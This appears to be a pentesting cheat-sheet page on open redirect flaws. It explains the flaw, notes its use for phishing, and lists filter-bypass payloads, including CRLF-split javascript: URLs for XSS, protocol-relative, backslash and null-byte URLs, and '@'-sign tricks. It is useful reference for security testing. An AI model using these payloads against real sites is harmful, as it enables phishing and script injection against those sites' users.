# Open Redirect

### Overview

A website is vulnerable to Open Redirect when parameter values (the portion of URL after "?") in an HTTP GET request allow for information that will redirect a user to a new website&#x20;without proper validation of the target of the redirect. Depending on the architecture of a vulnerable website, redirection could happen after a certain action, such as login, and&#x20;sometimes it could happen instantaneously upon loading of a page.

An example of a vulnerable website link could look something like this: `https://www.example.com/login.html?RelayState=http%3A%2F%2Fexample.com%2Fnext`

Makes it really easy to get **phishing** done - just redirect to your own site and ask for a login.

### Exploiting Semi-Hardcoded Paths

If the redirection is done like this:

```
Window.location.href = hardcoded_part + malicious_part
```

Then you might still be able to redirect to your own site using the `@` sign (might not work, depending on the hardcoded part)

Tests:

* `http://example.com@test.com`&#x20;
  * Works for chrome
  * Works on Firefox but gives phishing warning
* `http://example.com/page@test.com`
  * Doesn't work
* `page@test.com`&#x20;

  * Doesn’t work

### Filter Bypassing

Here are some things to try to bypass filters and still be able to get open redirect to work:

* `java%0d%0ascript%0d%0a:alert(0)`
  * CRLF injection to bypass `javascript:` being blacklisted
  * Results in **XSS**
* `//google.com`
  * In case http\:// is blacklisted
* `https:google.com`
  * Browsers accept this, good if `//` is blacklisted
* `//google%E3%80%82com`
  * `%E3%80%82` is `。` encoded.&#x20;
* `\/\/google.com/`
  * Useful for bypassing // http\:// blacklists. Browsers see \\/\\/ as //)
* `/\/google.com/`
  * Same as above
* `//google%00.com`
  * Attempt to use a null byte to bypass a blacklist filter.
* `http://www.theirsite.com@yoursite.com/`
  * Browsers will redirect to anything after @
* `http://www.yoursite.com/http://www.theirsite.com/`
  * If `@` is blacklisted and they check if their domain is in the param, then make a folder on your site with the name of their domain
* `";alert(0);//`
  * If the url is echoed in a variable and we want to get xss in script tag